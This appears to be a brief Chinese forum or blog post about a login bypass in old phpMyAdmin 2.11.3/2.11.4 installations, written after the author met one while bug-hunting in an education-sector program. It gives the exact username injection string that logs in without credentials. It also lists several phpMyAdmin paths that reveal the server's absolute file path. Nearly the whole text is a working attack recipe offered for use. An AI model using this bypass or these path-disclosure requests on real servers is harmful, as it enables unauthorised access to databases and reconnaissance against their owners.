phpmyadmin 万能密码漏洞 版本2.x

影响版本：2.11.3 / 2.11.4   大约2012年左右的网站   貌似不多了   刷教育SRC 碰到一个 

利用方法：用户名处写入‘localhost’@'@”则登录成功。 (注意全部是英文标点符号，最后一个为英文双引号)

附上几个php爆绝对路径的办法：

phpMyAdmin/libraries/select_lang.lib.php

phpMyAdmin/darkblue_orange/layout.inc.php

phpMyAdmin/index.php?lang[]=1

phpmyadmin/themes/darkblue_orange/layout.inc.php